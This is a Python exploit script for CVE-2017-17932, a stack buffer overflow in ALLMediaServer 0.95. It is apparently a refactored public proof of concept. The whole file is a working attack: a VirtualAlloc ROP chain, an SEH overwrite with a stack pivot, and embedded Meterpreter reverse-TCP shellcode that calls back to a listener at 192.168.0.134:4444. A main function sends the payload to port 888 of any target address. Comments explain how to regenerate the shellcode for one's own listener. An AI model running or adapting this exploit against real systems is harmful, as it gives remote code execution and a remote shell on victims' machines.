#!/usr/bin/python
# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95
# Exploit Author: Mario Kartone Ciccarelli
# Contact: https://twitter.com/Kartone
# CVE: CVE-2017-17932
# Date: 09-01-2018
# Based on the crash PoC: https://www.exploit-db.com/exploits/43406/
# Software link: http://www.allmediaserver.org/download
# Version: 0.95
# Attack: Remote Code Execution
# Tested on: Windows 7 x64 Ultimate Eng SP1

import sys
import socket
import struct

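# ---------------------------------------------------------------------------
# Target / payload parameters.  Every offset and address below was measured
# against MediaServer.exe 0.95 on the tested Windows 7 x64 SP1 box (see the
# header); none of them is expected to survive a different build.
# ---------------------------------------------------------------------------
TARGET_PORT = 888         # listener that parses the overflowing request
PAYLOAD_SIZE = 3000       # total bytes sent; the tail is padded with "B"
SEH_OFFSET = 1072         # offset of the nSEH record inside the request
SP_OFFSET = 548           # offset the ROP chain is placed at, so that the
                          # ADD ESP,800 pivot returns into it

# Stack-pivot at 0x0042b356 : {pivot 2052 / 0x804} : # ADD ESP,800 # POP EBX # RETN
# [MediaServer.exe] | startnull {PAGE_EXECUTE_READ}.  Installed as the SEH handler.
STACK_PIVOT = 0x0042b356


def create_rop_chain():
    """Return the VirtualAlloc() ROP chain as packed little-endian DWORDs.

    Every gadget lives in MediaServer.exe and is an absolute address, so the
    chain assumes the image is loaded at its default base (no ASLR rebasing)
    -- TODO confirm on anything other than the tested build.

    It is the usual PUSHAD pattern: the registers are loaded so that
    ``PUSHAD # RETN`` lays out a VirtualAlloc() call frame on the stack:

        EDI = RETN                (first thing returned into; a ROP NOP)
        ESI = &VirtualAlloc       (resolved through the IAT slot, called next)
        EBP = jmp esp             (VirtualAlloc's return address)
        ESP = lpAddress           (PUSHAD pushes ESP itself: the current stack page)
        EBX = 0x00000001          (dwSize)
        EDX = 0x00001000          (flAllocationType, MEM_COMMIT)
        ECX = 0x00000040          (flProtect, PAGE_EXECUTE_READWRITE)
        EAX = 0x90909090          (NOPs: when VirtualAlloc returns through
                                   ``jmp esp`` these run and execution falls
                                   through into the bytes that follow the
                                   chain in the payload, i.e. the JMP to the
                                   shellcode built by build_payload())
    """
    rop_gadgets = [
        0x00407f5d,  # POP EAX # RETN [MediaServer.exe]
        0x00797250,  # ptr to &VirtualAlloc() [IAT MediaServer.exe]
        0x004061db,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MediaServer.exe]
        0x0053bc02,  # XCHG EAX,ESI # RETN [MediaServer.exe]
        0x006c71f8,  # POP EBP # RETN [MediaServer.exe]
        0x00449a05,  # & jmp esp [MediaServer.exe]
        0x0049bbc4,  # POP EBX # RETN [MediaServer.exe]
        0x00000001,  # 0x00000001-> ebx
        0x00500b33,  # POP EDX # RETN [MediaServer.exe]
        0x00001000,  # 0x00001000-> edx
        0x006b5c67,  # POP ECX # RETN [MediaServer.exe]
        0x00000040,  # 0x00000040-> ecx
        0x0042365d,  # POP EDI # RETN [MediaServer.exe]
        0x006def0d,  # RETN (ROP NOP) [MediaServer.exe]
        0x0040710f,  # POP EAX # RETN [MediaServer.exe]
        0x90909090,  # nop
        0x0068c35c,  # PUSHAD # RETN [MediaServer.exe]
    ]
    return b"".join(struct.pack("<I", gadget) for gadget in rop_gadgets)


# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134 lport=4444 -f python
# NOTE: LHOST/LPORT are baked into these bytes (the "\x68\xc0\xa8\x00\x86" and
# "\x68\x02\x00\x11\x5c" pushes); regenerate the stub for your own listener.
# Bad characters were not documented by the author -- TODO confirm that a
# replacement stub still survives the parser.
SHELLCODE = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
    b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
    b"\xff\xd5\x6a\x0a\x68\xc0\xa8\x00\x86\x68\x02\x00\x11"
    b"\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
    b"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
    b"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
    b"\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
    b"\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
    b"\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
    b"\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
    b"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
    b"\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
    b"\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
    b"\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
    b"\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
)


def build_payload(shellcode=SHELLCODE):
    """Assemble the PAYLOAD_SIZE-byte request that overflows the stack buffer.

    Layout (offsets from the start of the request, with the stock chain):

        0      "A" padding up to the ROP chain
        548    ROP chain (the SEH-installed ADD ESP,800 pivot returns into it)
        616    JMP rel32 to the shellcode, reached through the NOP dword
               once VirtualAlloc() returns via ``jmp esp``
        ...    "A" padding up to the SEH record
        1072   nSEH record (0xffffffff)
        1076   SEH handler = STACK_PIVOT
        1080   shellcode
        ...    "B" padding up to PAYLOAD_SIZE

    Args:
        shellcode: raw x86 stub placed right behind the SEH record.

    Returns:
        bytes of length PAYLOAD_SIZE.

    Raises:
        ValueError: if the ROP chain would overrun the SEH record or the
            shellcode does not fit in PAYLOAD_SIZE (the original silently
            produced an oversized request in that case).
    """
    rop_chain = create_rop_chain()
    shellcode_offset = SEH_OFFSET + 8          # right behind nSEH + SEH
    jmp_offset = SP_OFFSET + len(rop_chain)
    # E9 rel32 is relative to the end of the 5-byte instruction; with the
    # stock chain this is 0x1cb, i.e. the author's "JMP $1d0" from offset 616.
    rel32 = shellcode_offset - (jmp_offset + 5)
    jmp_to_shellcode = b"\xe9" + struct.pack("<i", rel32)

    payload = b"A" * SP_OFFSET + rop_chain + jmp_to_shellcode
    if len(payload) > SEH_OFFSET:
        raise ValueError("ROP chain overruns the SEH record at offset %d" % SEH_OFFSET)
    payload += b"A" * (SEH_OFFSET - len(payload))
    payload += b"\xff\xff\xff\xff"                 # nSEH record
    payload += struct.pack("<L", STACK_PIVOT)      # SEH handler -> stack pivot
    payload += shellcode
    if len(payload) > PAYLOAD_SIZE:
        raise ValueError(
            "shellcode too large: request is %d bytes, limit is %d"
            % (len(payload), PAYLOAD_SIZE)
        )
    payload += b"B" * (PAYLOAD_SIZE - len(payload))
    return payload


def main():
    """Entry point: connect to ``<target>:888`` and send the overflow request.

    The target IP is taken from ``sys.argv[1]``; a usage line is printed and
    the process exits with status 1 when it is missing.  ``sendall`` is used
    instead of ``send`` so a short write cannot truncate the request, and
    the socket is always closed.
    """
    if len(sys.argv) != 2:
        sys.stderr.write("Usage: %s <target-ip>\n" % sys.argv[0])
        sys.exit(1)
    target = sys.argv[1]

    payload = build_payload()
    print("[+] AllMediaServer 0.95 Stack Buffer Overflow Exploit")
    print("[+] Sending evil payload to " + target + "...")

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target, TARGET_PORT))
        sock.sendall(payload)
    finally:
        sock.close()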


# Run the exploit only when executed as a script, never on import.
if __name__ == "__main__":
    main()